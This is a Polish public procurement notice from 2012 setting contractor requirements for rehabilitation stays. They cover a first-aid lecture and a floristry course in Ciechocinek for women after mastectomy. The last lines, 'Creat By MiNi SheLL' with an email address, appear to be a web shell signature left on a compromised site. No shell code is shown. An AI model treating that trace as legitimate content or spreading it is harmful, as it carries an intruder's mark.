1. Ocena sytuacji i zabezpieczenie miejsca wypadku.
2. Ocena stanu poszkodowanego, kontrola czynności życiowych - pokaz.
3. Postępowanie z poszkodowanym nieprzytomnym - pokaz.
4. Podstawowe Podtrzymywanie Życia - pokaz.(resuscytacja krążeniowo-oddechowa)
5. Postępowanie w przypadku krwotoków, poważnych ran i oparzeń.
6. Postępowanie w przypadku innych urazów.

Prelekcja wraz z pokazem z zakresu udzielania pierwszej pomocy przedmedycznej przeprowadzana w 2 grupach po 3 godziny lekcyjne.
Prowadzący: osoba posiadająca wykształcenie wyższe medyczne lub uprawnienia ratownika medycznego, doświadczenie w prowadzeniu szkoleń z w/w zakresu oraz uprawnienia pedagogiczne i doświadczenie         w pracy z osobami niepełnosprawnymi.

Wszystkie materiały, pomoce, narzędzia i urządzenia niezbędne do przeprowadzenia warsztatów, szkolenia oraz prelekcji wraz z pokazem zapewnia Wykonawca.
W czasie przerw Wykonawca zabezpiecza również serwis kawowy.

Program kulturalno-oświatowy i program szczegółowy warsztatów szkolenia i prelekcji  przedstawia Wykonawca, którego oferta została wybrana na dwa dni przed podpisaniem umowy. 
Wykonawca zobowiązany będzie do prowadzenia odpowiedniej dokumentacji: 
- Dzienna lista obecności uczestników warsztatów, szkolenia i prelekcji.
- Dziennik zajęć zawierający m.in. wymiar godzin i tematy zajęć warsztatowych,
- Rejestr wydanych zaświadczeń potwierdzających ukończenie warsztatów, 
Wykonawca zobowiązany będzie do przekazania Zamawiającemu, w terminie do 14 dni od dnia zakończenia warsztatów, szkolenia i prelekcji następujących dokumentów: 
- Kserokopii ankiet oceniających, przeprowadzonych wśród uczestników zajęć;
- Opinia prowadzącego w zakresie postępów poczynionych przez uczestników na szkoleniach, 
- Imiennego wykazu osób, które ukończyły zajęcia; 
- Kserokopii wydanych zaświadczeń potwierdzających ukończenie warsztatów, szkolenia, prelekcji
- Kserokopii dziennika zajęć; 
- Kserokopii list obecności; 
Wykonawca zobowiązany będzie do prowadzenia dokumentacji fotograficznej z zajęć rehabilitacyjnych, warsztatów, wycieczek i programu kulturalno - oświatowego oraz przekazania Zamawiającemu na płycie CD w terminie do 14 dni od zakończenia turnusu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.14.00.00-2, 85.31.25.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2 (dla 9 amazonek)
turnus rehabilitacyjny usprawniająco-rekreacyjny w Ciechocinku z kursem bukieciarsko-florystycznym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stacjonarny turnus usprawniająco-rekreacyjny przeznaczony jest dla grupy 9 kobiet w wieku aktywności zawodowej, zagrożonych wykluczeniem społecznym z powodu niepełnosprawności:
po mastektomii
z dysfunkcją narządu ruchu,
ze schorzeniami układu krążenia
 skierowanych na turnus przez lekarzy, pod opieką których się znajdują. 
W turnusie uczestniczyć będzie 9 osób niepełnosprawnych.. 
Czas trwania turnusu: 14 dni pobytowych, w terminie 19.05.2012r. - 02.06.2012r. 
Zamówienie obejmuje transport uczestników z wyznaczonego miejsca w Sędziszowie i Jędrzejowie do miejsca odbycia turnusu (trasa: Sędziszów - Jędrzejów - Ciechocinek) i z miejsca odbycia turnusu po jego zakończeniu, do Jędrzejowa i Sędziszowa (trasa: Ciechocinek - Jędrzejów - Sędziszów). 
Miejsce odbywania turnusu: Ciechocinek - ośrodek wpisany do rejestru właściwego wojewody, zgodnie          z przepisami rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych (Dz.U. Nr 230, poz. 1694), przystosowany do realizacji turnusów rehabilitacyjnych dla osób niepełnosprawnych.
Wykonawca zagwarantuje pobyt w ośrodku w budynku, w którym będą zlokalizowane pomieszczenia sypialne, do rehabilitacji i do przeprowadzenia kursu. Dopuszcza się lokalizację gabinetów do rehabilitacji w innym budynku jeżeli odległość pomiędzy tymi budynkami nie przekroczy 150 m. 
Wymogi o charakterze ogólnym : 
- Po zakończeniu turnusu Wykonawca przedstawia Zamawiającemu informację o jego przebiegu. Informację, sporządzoną odrębnie dla każdego uczestnika turnusu, należy przedłożyć w siedzibie Zamawiającego w nieprzekraczalnym terminie 21 dni od daty zakończenia turnusu. Wzór informacji określa załącznik nr 7 do rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych (Dz.U. Nr 230, poz. 1694). 
- Wykonawca po zakończeniu turnusu rehabilitacyjnego przedstawi Zamawiającemu rozliczenie za każdego uczestnika zgodnie z § 8 ust. 8 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych (Dz.U. Nr 230, poz. 1694). 
- Wykonawca obowiązany jest przechowywać dokumentację dotyczącą turnusu określoną w § 12 ust. 1 pkt 10 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych (Dz.U. Nr 230, poz. 1694) oraz spełnić inne, nie wymienione wyżej wymagania, jakie wynikają dla organizatorów turnusów z przepisów tego rozporządzenia. 
- Wykonawca zobowiązuje się do oznakowania miejsc, w których korzystać będą uczestnicy turnusu poprzez umieszczenie plakatów informacyjnych dotyczących projektu, które otrzyma od Zamawiającego po podpisaniu umowy.
Wykonawca w ramach zaoferowanej ceny zapewni uczestnikom: 
- przewóz z wyznaczonego miejsca w Sędziszowie i Jędrzejowie do miejsca odbywania turnusu i z miejsca turnusu rehabilitacyjnego, po jego zakończeniu, do Jędrzejowa i Sędziszowa, busem o ilości miejsc odpowiedniej do ilości uczestniczek turnusu (tj. nie mniejszej niż 9) i nie starszym niż 5 lat. 
- zakwaterowanie w ośrodku w pokojach 2 i 3-osobowych (3 pokoje 2-osobowe i 1 pokój 3-osobowy)           z pełnym węzłem sanitarnym (wc, prysznic lub wanna, umywalka), telewizorem i czajnikiem elektrycznym.
- całodzienne wyżywienie obejmujące co najmniej śniadanie, obiad i kolację oraz suchy prowiant w drodze powrotnej z turnusu. Suchy prowiant musi odpowiadać 75% wartości stawki dziennej wyżywienia na każdego uczestnika. 
- pełną realizację opracowanych i złożonych u właściwego wojewody programów turnusów odpowiednich ze względu na ich rodzaj oraz rodzaje niepełnosprawności albo schorzenia lub dysfunkcje uczestników, 
- zaplecze techniczne, użytkowe, socjalne umożliwiające realizację programów turnusów ( sale zabiegowe, urządzenia do ćwiczeń, urządzenia do rehabilitacji, sale do zajęć), 
- fachową kadrę gwarantującą prawidłową realizację programu turnusu z kursem bukieciarsko- florystycznym, w skład której wchodzą w szczególności: kierownik odpowiedzialny za przebieg turnusu, pielęgniarka, specjalista do rehabilitacji ruchowej, fizjoterapeuta, kinezjoterapeuta, osoba prowadząca kurs.
- stałą opiekę pielęgniarską i możliwość korzystania z opieki lekarskiej podczas turnusu 
- badanie lekarskie na początku i na końcu turnusu, 
- co najmniej dwa zabiegi rehabilitacyjne dziennie ( min. 20 zabiegów w trakcie turnusu na osobę), 
- przygotowanie i realizację programu kulturalno-oświatowego
Wszystkie koszty związane z przygotowaniem i realizacją powyższego programu kulturalno-oświatowego (np. autokar, przewodnik, bilety wstępu i inne) po stronie Wykonawcy. 
- ubezpieczenie od następstw nieszczęśliwych wypadków w czasie podróży i pobytu na turnusie,
 
- pokrycie kosztów opłaty klimatycznej.
 
W ramach pobytu na turnusie należy przeprowadzić: 
Kurs bukieciarz-florysta obejmujący zakres:
- Artykuły dekoracyjne
- Kompozycje w naczyniach
- Dekoracje okolicznościowe
- Kompozycje z roślin sztucznych i preparowanych
- Kompozycje kuchenne
Kurs bukieciarsko-florystyczny powinien obejmować łącznie 30 godzin lekcyjnych, w tym zajęcia teoretyczne  i praktyczne na materiale florystycznym.
Prowadzący: osoba posiadające wykształcenie wyższe ogrodnicze, doświadczenie w prowadzeniu szkoleń    z w/w zakresu, posiadająca uprawnienia pedagogiczne oraz doświadczenie w pracy z osobami niepełnosprawnymi.

Wszystkie materiały, pomoce, narzędzia i urządzenia niezbędne do przeprowadzenia kursu zapewnia Wykonawca.
W czasie przerw Wykonawca zabezpiecza również serwis kawowy.

Program kulturalno-oświatowy i program szczegółowy kursu  przedstawia Wykonawca, którego oferta została wybrana na dwa dni przed podpisaniem umowy. 
Wykonawca zobowiązany będzie do prowadzenia odpowiedniej dokumentacji: 
- Dzienna lista obecności uczestników kursu
- Dziennik zajęć zawierający m.in. wymiar godzin i tematy zajęć,
- Rejestr wydanych zaświadczeń potwierdzających ukończenie kursu, 
Wykonawca zobowiązany będzie do przekazania Zamawiającemu, w terminie do 14 dni od dnia zakończenia kursu następujących dokumentów: 
- Kserokopii ankiet oceniających, przeprowadzonych wśród uczestników zajęć; 
- Opinia prowadzącego w zakresie postępów poczynionych przez uczestników na kursie,
- Imiennego wykazu osób, które ukończyły zajęciach; 
- Kserokopii wydanych zaświadczeń potwierdzających ukończenie kursu,
- Kserokopii dziennika zajęć; 
- Kserokopii list obecności; 
Wykonawca zobowiązany będzie do prowadzenia dokumentacji fotograficznej z zajęć rehabilitacyjnych, kursu, wycieczek i programu kulturalno - oświatowego oraz przekazania Zamawiającemu na płycie CD       w terminie do 14 dni od zakończenia turnusu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.14.00.00-2, 85.31.25.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 02.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com